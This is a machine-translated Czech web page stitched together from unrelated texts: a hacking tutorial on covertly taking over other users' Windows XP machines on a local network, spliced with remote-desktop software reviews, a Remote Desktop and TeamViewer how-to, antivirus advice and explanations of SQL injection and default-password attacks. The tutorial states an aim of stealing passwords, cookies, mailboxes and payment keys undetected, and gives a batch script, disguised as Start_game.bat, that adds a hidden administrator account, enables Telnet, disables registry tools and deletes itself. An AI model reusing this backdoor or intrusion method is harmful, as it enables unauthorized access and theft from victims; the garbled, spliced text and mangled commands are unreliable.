V záložkách
Kontaktujte násO webu

Dálkové ovládání počítače bez znalosti uživatele. Přístup k síti na obrazovce někoho jiného: vzdáleně se připojte k počítači přes internet

Ahoj všichni, toto je můj první článek na webu, takže neposuzujte přísně. V tomto příspěvku budu popisovat, jak můžete získat vzdálený přístup k počítači uživatele v místní síti prostřednictvím příkazového řádku, obejdete všechny antivirové programy a trochu víte o syntaxi příkazového řádku systému Windows. Článek je určen pouze pro systém Windows XP, ale pokud si přejete, můžete přepisovat kód pro libovolný jiný operační systém Windows. Takže začneme. Celkově je článek napsán pro vstupní uživatele. Nejdůležitějším úkolem je získat potřebná data (hesla, vzhledy, chalupy, přístup k poštovním schránkám, klíčovým souborům webmoney, cookies a dalším důležitým lupům) a nechat bez povšimnutí a nezanechat stopy narušení. Takže začneme, jsem v lokální síti s asi 5000 uživateli, síť se statikou nebo dhcp nezáleží, dostanu IP adresu a jsem šťastná. Síť má spoustu podsítí, jejichž trasy jsou registrovány na serveru. MAC adresa počítače je zaregistrována u správce sítě, jako v mém případě to byla podmínka připojení k síti, takže se můj Mac rozsvítí, pokud se něco stane. Abychom se vyhnuli našemu záměru, nejprve nainstalujeme virtuální počítač (pomocí programu VmWare 5.1), nainstalujeme na něj XP, skener portu (používáme SuperScan 3.00, který si můžete stáhnout) a spustíme službu Telnet. Připojujeme virtuální počítač k síti pomocí NAT a získáme tak úplně jinou mac-adresu stroje, která se dívá do sítě. Všichni gud virtualku nastavit, pokračujte. Otevřete běžný notebook a zapište dávkový soubor s následujícím obsahem:

Jedná se o komplexní proces pro uživatele bez zvláštních technických znalostí. Software je k dispozici v komerčních verzích, které přidávají další funkce, ale s vysokými hodnotami. Neobchodní bezplatná verze je dobrou volbou pro základní vzdálený přístup, ale pokud potřebujete vzdáleně tisknout, ostatní programy mají jednodušší proces.

Programy nejsou přívětivé pro firewall a vyžadují, aby konkrétní port byl předán každému hostiteli, který potřebujete k přístupu. Není to tak elegantní jako přístup na webové stránky a kliknutí na počítač, ke kterému se chcete připojit, ale funguje to.

   @ Vypnout ozvěnu
   Síťový uživatel Admin_Support lop / add\u003e nul
Čistá lokální skupina lokální skupiny Ё ¬YoEbwa v ® Admin_support / add\u003e nul
   Čisté účty / maxpwage: neomezené\u003e nul sc config TlntSvr start = auto\u003e nul
   Sc start TlntSvr\u003e nul
   Reg add «HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Winlogon \\ SpecialAccounts \\ UserList» / v Admin_support / t REG_DWORD / d 0\u003e null
   Reg add »HKCU \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System» / V DisableRegistryTools / t REG_DWORD / d 1 / f\u003e nul reg add «HKCU \\ Software \\ Policies \\ Microsoft \\ MMC» / v RestrictPemitSnapins / t REG_DWORD / d 1 / f\u003e nul% SestemRoot% \\ system32 \\ compmgmt.msc\u003e nul
  del Start_game.bat

A ačkoli to nemá schopnost vzdáleného tisku, má některé velmi dobré vlastnosti. Stejně jako v některých dalších programech jsem musel otevřít port na firewallu. Dálkové ovládání hostitelského počítače fungovalo dobře a odpovídalo dobře. Podařilo se mi upravit velikost obrazovky jednoduchým přetažením okrajů okna klienta.

Software také obsahuje několik pluginů zabudovaných do systému. Technici podpory zákazníků pravděpodobně budou mít zájem o modul plug-in Exploreru, který dává vzdálenému uživateli vylepšený pohled na hostitelský počítač, stejně jako správce souborů.

Tagy: viry, hacking, bezpečnost, bezpečnost informací

Diskuse o tom, co představuje internet sémanticky - Síť nebo Velké koše - nesouvisí s hlavními rysy tohoto prostředí. Jedná se o možnost komunikace mezi zařízeními vzdálenými od sebe. Síť sdílí aktivní poskytovatelé dat - servery a pasivní - běžné uživatele (klienty). Stejný počítač může fungovat jak jako klient, tak jako server - velmi často se jedná o tento případ.

Jak nebezpečný software může mít vliv na vás

Nativní podpora přesměrovaného tisku není podporována. Tyto programy nebyly navrženy se špatnými úmysly, ale obsahovaly funkce, které mohou být použity ke škodlivým účelům. S tolika legitimními programy, které útočníci mohou používat pro nelegální účely, může být obtížné určit, které z nich představují riziko. Programy vzdálené správy jsou například často používány správci systému a službami helpdesku k diagnostice a řešení problémů, ke kterým dochází v počítači uživatele.

Příklad interakce mezi klienty a servery je přístup k webovým stránkám přes internet. Server počítače přijímá požadavek od uživatele vzdáleného klienta a dává mu obsah následující stránky. Máme však zájem o vzdálený servis úplně jiného druhu - schopnost připojit se k počítači na jiném počítači, tj. jak se připojit k jinému počítači přes internet a vidět vše, co se děje na jeho obrazovce.

Pokud však byl program v počítači nainstalován škodlivým uživatelem, bez vašeho vědomí bude mít tento uživatel vzdálený přístup k počítači. Plně kontrolujete počítač a útočník jej může použít k tomu, aby něco udělal.

Jak se chránit před nebezpečným softwarem

Protože mohou existovat oprávněné důvody pro odůvodnění přítomnosti nebezpečného softwaru ve vašem počítači, antivirové řešení nemusí být schopny určit, zda je program ohrožen. Detekce a odstranění potenciálně nebezpečného softwaru Existuje mnoho důvodů, proč máte podezření, že hrozivý program detekovaný mechanismem Kaspersky Anti-Virus je hrozbou. V těchto případech vám Kaspersky Anti-virus software pomůže zbavit se nebezpečného softwaru. V případech, kdy jsou detekovány programy, které jsou nebezpečné pro software, ale nutně s nimi souhlasíte, můžete se rozhodnout, zda představují riziko pro vaše zařízení nebo data. Schopnost nezachytit rizikový software. . Máte-li jakékoli dotazy ohledně zabezpečení informací, přejděte na konec přehledu a použijte sekci Poznámky.


Proč budete potřebovat takové vzdálené připojení? Například, aby pomohla kolegovi nebo kamarádovi při provádění nepochopitelných operací. Mnoho společností využívá toto vzdálené připojení ke kontrole práce svých zaměstnanců, stejně jako k pomoci vzdáleným klientům. Jedním slovem to bude spojení a my se zamyslíme nad tím, jak ho používat.

Ve sloupci jsou odpovědi na otázky, které čtenáři zanechávají každý čtvrtek. Hackeři skutečně vypadají neuvěřitelně, napadají systémy, vytvářejí stránky a získají tajné informace. Nicméně jejich činy jsou často snazší, než se očekávalo, kvůli přítomnosti absurdních bezpečnostních děr, které mohou využít i lidé, kteří nemají mnoho znalostí v oblasti informatiky. A jedno z tajemství hackerů volí správné cíle. Ve sloupci Digital Security jsou uvedeny některé příklady.

Odtud můžete stránky změnit, protože změní libovolný soubor v samotném počítači. Jedná se o technologii pro správu webových stránek. Je však obtížné najít stránky s touto nevýhodou. Sdílení bez selhání hesla a ověřování. Toto sdílení, určené pro počítače v místní síti, bylo k dispozici na internetu a umožnilo komukoli přístup k místním souborům v počítači. Zobrazí se všechny sdílené složky a lze je přečíst, upravit nebo smazat.

Existují dva způsoby, jak toto připojení umožnit: pomocí vestavěných nástrojů v systému Windows nebo pomocí programů třetích stran.

Zvažte tyto metody v pořadí.

Integrovaná sada nástrojů Windows

Standardní metodou pro připojení k cizímu počítači a jeho pracovní ploše je použití nástroje Windows, který se nazývá - "Připojení ke vzdálené ploše". Chcete-li se připojit k jinému počítači, postupujte takto:

Nicméně ani ten, kdo nastavil heslo, se tomuto útoku vyhnul. Za tím účelem musí správce webu na webu nainstalovat software. Během procesu instalace bylo nastaveno heslo. V mnoha případech jsou tyto instalátory zapomenuty. Chcete-li hackovat webové stránky, všichni hacker potřebuje přístup k instalačnímu programu, spuštění parametrů zobrazených na obrazovce a překonfigurování hesla pro správu.

Dnes mají instalátoři funkce zamykání, takže nebudou běhat víc než jednou - protože mnoho lidí stále zapomene vymazat instalační techniku ​​po jeho použití. Soubor byl vždy k dispozici na stejné adrese. Chcete-li hackovat webové stránky, stačí zkontrolovat, zda soubor existuje, nahrát a zrušit ochranu, která byla použita k uložení hesla. Tato mezera byla na konci roku silně využita. Chcete-li tento problém vyřešit, stačí zabránit čtení souboru.

Přejděte do nabídky "Start" a zavolejte na výše uvedenou službu.

Před námi se otevře okno přibližně následujícího typu:

Do pole "Počítač" zadejte adresu IP vzdáleného systému nebo jeho název sítě.

Pokud je vzdálený systém připraven poskytnout vám plochu, zobrazí se na obrazovce během několika sekund. Na druhé straně musí mít připojení přístupová práva ke vzdálené ploše konfigurovaná pro vás jako klient.

Funguje to takto: uživatel a heslo zadané do formuláře je třeba prohledat v databázi: existuje uživatel "takový" s heslem "such"? A program musí používat jednoduché uvozovky pro definici "takových" a "takových", aby odlišení argumentu dotazu.

Zadáním jednoduchých uvozovek do přihlašovacího formuláře hacker rozdělí vyhledávací logiku a zbytek již není otázkou, to znamená, že databáze nebude vyhledávat uživatele s tímto jménem, ​​ale interpretuje to, co bylo součástí žádosti. Zde kouzlo začíná: "nebo" je anglické slovo, které znamená "nebo", a mění logiku "otázky", kterou databáze přijímá.

Odesílání takového obsahu jako obrázku z obrazovky počítače přes internet je poměrně nákladné podnikání. Neexistuje vždy potřeba vysoké kvality přenášeného obrazu. Někdy dostatečně nízké rozlišení obrazovky. Chcete-li nakonfigurovat tento a další parametry pracovní plochy jiného uživatele, musíte klepnout na tlačítko "Možnosti" a přiřadit potřebné možnosti.

Protože 1 bude vždy 1, databáze vrátí do systému všechny stávající uživatele. Vzhledem k tomu, že software chápe, že se přihlásí pouze jeden uživatel, použije první výsledek v databázi, který je obvykle administrátor.

Výsledkem je plný přístup do systému bez nutnosti znát uživatele a heslo. Software chráněný proti tomuto selhání neumožňuje odesílání jednoduchých uvozovek do příkazu databáze a také ověřuje, že žádost byla vrácena několika uživatelům - což by se nikdy nemělo stát.


Okno parametrů obsahuje několik záložek a mnoho možností, které nemají místo a příležitost podrobně diskutovat. Seznamujeme je stručně, aby bylo jasné, co je v sázce. V okně nastavení můžete tyto položky upravit a zadat:

Adresy? Tento program může změnit stránku nebo dokonce dát správu serveru hackerovi. Hackeři nepotřebují vědět, jak tento speciální program rozvíjet, protože ho lze nalézt na internetu. Existuje několik "chutí" - stačí vybrat. Stránky, které nejsou náchylné k této chybě, nesou jména a oprávněné adresy v kódu, tj. Program pochopí, že obsah má neplatnou hodnotu a ignoruje ji. Chcete-li zabránit hackingu klientů, poskytovatelé hostingu často zabraňují načítání internetových adres do kódu webu, a tím i ochranu zranitelných bodů útoku.

  • Rozlišení obrazovky kvality stolního počítače a barev.
  • Přenos přes nastavení Internetu jiného počítače, například klávesové zkratky. Některé další nastavení nahrazují své vlastní v době připojení.
  • Program, který se spouští při přístupu k pracovní ploše jiného uživatele. To se týká programu na připojeném počítači.
  • Mnoho dalších funkcí uvedených na kartě "Pokročilé",, včetně různých vizuálních efektů.

Seznamte se s týmem "Team Viewer" .-

Po delší dobu však toto selhání umožnilo vniknout do mnoha webových stránek a jednoduše dát do webového prohlížeče určitou adresu, která ho aktivuje. Výchozí heslo Při nastavení stránky nebo systému opustí správce stejné heslo, které bylo nastaveno ve výrobním závodě. Veškeré potřeby hackerů je zkontrolovat manuál nebo software, zkontrolovat výchozí heslo a zkusit. Pokud bude úspěšná, invaze bude dokončena.

V současné době mnoho softwarových nástrojů generuje při instalaci náhodné hesla. Hardwarová zařízení mohou již pro každé zařízení používat jiné heslo založené na sériovém čísle nebo jiném identifikátoru, který je k dispozici. Tyto skripty mohou mít mnoho funkcí, včetně smazání, vytváření nebo stahování souborů.

Budeme předpokládat, že jste tak daleko od diskutovaných otázek, že nevíte o existenci nádherného programu "Team Viewer". . Při jeho použití je připojení přes internet k jinému systému dokonce jednodušší než pomocí vestavěných nástrojů Windows. Program má bohaté rozhraní a vývojářům nabízí velké možnosti. Pro domácí použití je tento program zcela zdarma. Spojení s ním přes internet není omezeno nic kromě fantasie jeho tvůrců. Pokud máte podezření na komerční využití programu, pak bude čas připojení omezený přímo prostřednictvím sítě.



Pravidla, která zneužívají zranitelná místa, zpravidla nejsou v pořádku, protože pracují v některých softwarových chybových podmínkách. Protože využíval funkci samotného systému, pracoval ve 100% případů bez nepředvídaných okolností.

Z tohoto důvodu je tato zranitelnost široce využívána, zejména brazilskými hackery, a může být stále vidět v některých souborech webových útoků, i když je zastaralá. Vzhledem k tomu, že se jedná o jednu z "nejčistších" nedostatků, nemá smysl přestat používat, pokud je poškozený počítač oběti.

1 hvězdička2 hvězdičky3 hvězdičky4 hvězdičky5 hvězdiček 5,00 / 3
Domů Internet Dálkové ovládání počítače bez znalosti uživatele. Přístup k síti na obrazovce někoho jiného: vzdáleně se připojte k počítači přes internet
Související články: